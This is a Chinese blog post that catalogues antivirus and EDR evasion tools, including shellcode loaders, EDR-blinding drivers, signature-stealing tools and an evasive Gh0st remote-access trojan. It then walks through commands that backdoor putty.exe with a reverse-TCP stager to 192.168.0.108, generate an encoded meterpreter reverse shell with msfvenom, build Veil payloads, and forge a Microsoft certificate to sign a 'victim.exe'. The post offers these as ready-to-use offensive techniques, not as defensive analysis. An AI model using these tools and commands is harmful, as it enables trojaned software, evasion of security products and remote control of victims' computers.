首页 > 其他分享 >WEB渗透免杀篇-免杀工具全集

WEB渗透免杀篇-免杀工具全集

时间:2024-08-19 18:25:22浏览次数:7  
标签:WEB exe 免杀 全集 EDR shellcode payload

 往期文章

 WEB渗透免杀篇-加载器免杀-CSDN博客

 WEB渗透免杀篇-分块免杀-CSDN博客

WEB渗透免杀篇-Powershell免杀-CSDN博客

WEB渗透免杀篇-Python源码免杀-CSDN博客

WEB渗透免杀篇-C#源码免杀-CSDN博客

WEB渗透免杀篇-MSF+shellcode免杀-CSDN博客

WEB渗透免杀篇-Bypass-AMSI-CSDN博客

 工具列表 

工具名称下载地址工具描述
AV_Evasion_ToolGitHub - 1y0n/AV_Evasion_Tool: 掩日 - 免杀执行器生成工具掩日 - 免杀执行器生成工具
ScareCrowGitHub - optiv/ScareCrow: ScareCrow - Payload creation framework designed around EDR bypass.自动化生成 EDR 软件 Bypass Payload 的工具,一键化签名免杀
avetGitHub - govolution/avet: AntiVirus Evasion Tool
AniYaGitHub - piiperxyz/AniYa: 免杀框架免杀框架
shellcodeloaderGitHub - knownsec/shellcodeloader: shellcodeloadershellcode加载器
Themida需要自己去找资源加壳工具
SigThiefGitHub - secretsquirrel/SigThief: Stealing Signatures and Making One Invalid Signature at a Time签名工
ShellQMakerGitHub - SecurityAnalysts01/ShellcodeLoader at 1ff79fb9e1b9ad4934da88d9db82494d81a851c0超实用免杀
RealBlindingEDRGitHub - myzxcg/RealBlindingEDR: Remove AV/EDR Kernel ObRegisterCallbacks、CmRegisterCallback、MiniFilter Callback、PsSetCreateProcessNotifyRoutine Callback、PsSetCreateThreadNotifyRoutine Callback、PsSetLoadImageNotifyRoutine Callback...利用带有签名驱动程序的任意地址读/写实现:完全盲目或终止或永久关闭 AV/EDR。
QianjiGitHub - Pizz33/Qianji: 千机-红队免杀木马自动生成器 Bypass defender、火绒、360等国内主流杀软 随机加密混淆shellcode快速生成免杀马千机-红队免杀木马自动生成器
CreateUser夸克网盘分享免杀360创建windows用户工具
reshacker自行获取主要用于替换图标
upxGitHub - upx/upx: UPX - the Ultimate Packer for eXecutablesUPX - 用于扩展的终极打包器
Webshell-loaderGitHub - INotGreen/Webshell-loader: ASPX内存执行shellcode,绕过Windows Defender(AV/EDR)ASPX内存执行shellcode,绕过Windows Defender(AV/EDR)
GobypassAV-shellcodeGitHub - Pizz33/GobypassAV-shellcode: shellcode免杀加载器,使用go实现,免杀bypass火绒、360、核晶、def等主流杀软免杀shellcode加载器,使用go实现,免杀bypass火绒、360、核晶、def等主流杀软
Gh0st2023https://github.com/SecurityNo1/Gh0st2023重写免杀版Gh0st远控、大灰狼远控免杀,目前可免杀360、火绒、腾讯电脑管家等主流杀软。
bypassAVhttps://github.com/cseroad/bypassAV借助Win-PS2EXE项目编写cna脚本方便快速生成免杀可执行文件
在线免杀平台潮影在线免杀平台在线免杀平台
AV_Evasion_ToolGitHub - 1y0n/AV_Evasion_Tool: 掩日 - 免杀执行器生成工具掩日 - 免杀执行器生成工具 用于快速生成免杀的 EXE 可执行文件
ScareCrowGitHub - optiv/ScareCrow: ScareCrow - Payload creation framework designed around EDR bypass.自动化生成 EDR 软件 Bypass Payload 的工具,一键化签名免杀
BypassAv-webGitHub - M-Kings/BypassAv-web: nim一键免杀梅花K战队写的Nim一键免杀源码 使用nim语言进行shellcode加载
SharpThiefGitHub - INotGreen/SharpThief: 一键提取exe的图标、嵌入图标、资源信息、版本信息、修改时间、数字签名,降低程序熵值一键窃取文件的图标、资源信息、版本信息、修改时间、数字签名,降低程序熵值

Shellter

仅支持32位程序
>apt install shellter
指定一个exe文件

image

选择payload

the-backdoor-factory

GitHub - secretsquirrel/the-backdoor-factory: Patch PE, ELF, Mach-O binaries with shellcode new version in development, available only to sponsors

查看是否支持捆绑

>python backdoor.py -f /root/Desktop/putty.exe -S

查看此文件支持哪些payload

>python backdoor.py -f /root/Desktop/putty.exe -s show

reverse_shell_tcp_inline对应msf set payload windows/meterpreter/reverse_tcp meterpreter_reverse_https_threaded应msf set payload windows/meterpreter/reverse_https iat_reverse_tcp_stager_threaded修复IAT user_supplied_shellcode_threaded自定义payload 参数 -s 指定payload -H 回连地址 -P 回连端口 -J 多代码裂缝注入

>python backdoor.py -f ~/putty.exe -s iat_reverse_tcp_stager_threaded -H 192.168.0.108 -P 12138 -J -o payload.exe

后门生成在backdoored目录 或 生成payload

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.108 LPORT=12138 -e x86/shikata_ga_nai -i 5 -f raw -o shellcode.c

自定义

>python backdoor.py -f /root/putty.exe -s user_supplied_shellcode_threaded -U /root/shellcode.c  -o payload2.exe

Veil

>use 1选择evasion模块
>list查看可用payload
>use 7 选择c格式的payload
>set LHOST/LPORT设置回连IP和端口
>generate生成

image

直接生成的exe可能会被查杀,目前可过360,不能过火绒
使用minGW-w64编译C文件
>gcc -o vel.exe veil.c -l ws2_32

捆绑器

https://github.com/Yihsiwei/GoFileBinder

zirikatu

image

carboncopy

https://github.com/paranoidninja/CarbonCopy
可以创建任何网站的证书并签署
并且生成可执行文件的工具。适用于 Windows 和 Linux
>python3 CarbonCopy.py www.microsoft.com 443 victim.exe signed-victim.exe

标签:WEB,exe,免杀,全集,EDR,shellcode,payload
From: https://blog.csdn.net/qq_59468567/article/details/141331954

相关文章

  • Vulnhub靶机:AI-WEB-1.0
    一.网站查询二.扫描当前网站目录 扫出有http://172.16.1.88/robots.txt继续扫这个刚扫出来的,然后得出 我们再访问m3dinfo/info.php和 /se3reTdir777/这俩目录 得到如上图所示三.进行sql注入1.判断是否有sql注入 /有结果,有报错 2.利用burp抓包进行注入......
  • Java轻松实现跨平台(Windows、Linux)多协议(Twain、Sane)的Web扫描
     由于项目需要,开发在Windows下与Linux下扫描功能,Linux主要是信创的两个系统(UOS、麒麟),研究了一下发现,Windows使用Twain协议与扫描仪通讯,Linux使用的是Sane协议与扫描仪通讯,找到Twain协议和Sane协议的标准文档,英文的,都有大几百页,项目一个月内要求上线,明显没时间慢慢研究,于......
  • WebGIS产品分析
    WebGIS(网络地理信息系统)是指基于网络平台,客户端应用软件采用网络协议,运行在网络上的地理信息系统,即将GIS所能提供的功能通过网络展现给用户。顾名思义,WebGIS就是展现在网络上的GIS,是GIS与Web融合的产物。GIS通过Web功能得以扩展,使得GIS冲破专业圈子,真正成为大众化的GIS。如今,网......
  • 界面控件DevExpress ASP.NET Web Forms v24.1最新版本系统环境配置要求
    本文档包含有关安装和使用 DevExpressASP.NETWebForms控件的系统要求的信息。点击获取DevExpressv24.1正式版.NETFrameworkDevExpressASP.NETWebForms控件支持以下.NET框架版本。如果您需要DevExpress产品的早期版本,请咨询“在线客服”获取。IDEDevExpressASP.......
  • 秒开WebView?Android性能优化全攻略
    在如今的移动应用时代,用户体验的好坏直接关系到应用的成功与否。而在众多的用户体验因素中,应用的加载速度尤其重要。特别是对于使用 WebView 加载网页的应用,如果加载速度过慢,用户往往会产生不满,从而流失。因此,实现“秒开”WebView成为了开发者必须面对的一项挑战。本文将深......
  • net core web api 支持xml参数 设置
    废话不多说,上教程。......
  • Web大学生网页作业成品——24节气立夏介绍网页设计与实现(HTML+CSS)(1个页面)
    ......
  • webpack 构建流程
    webpack可以分为4个阶段:初始化阶段-webpack合并配置项创建Compiler注册插件编译阶段-build读取入口文件从入口文件开始编译调用loader对源代码进行转换借助babel解析为AST收集依赖模块递归对依赖模块进行编译操作生成阶段-seal创建chunk对......
  • web40 无参数rce
    点击查看代码<?php/*#-*-coding:utf-8-*-#@Author:h1xa#@Date:2020-09-0400:12:34#@LastModifiedby:h1xa#@LastModifiedtime:2020-09-0406:03:36#@email:[email protected]#@link:https://ctfer.com*/if(isset($_GET['c'])){......
  • web前端之根据字符串长度从长到短排序、中文字符串优先、样式循环、禁止冒泡、悬浮、
    MENU前言效果图htmlstyleJavaScript前言1、代码段由HTML、CSS(使用Sass语法)和JavaScript组成,创建一个文本框,用户可以在其中输入内容,并通过点击按钮进行操作。2、代码段的主要功能是允许用户输入一系列以、分隔的项,并根据长度对这些项进行排序(中文字符优先),然后......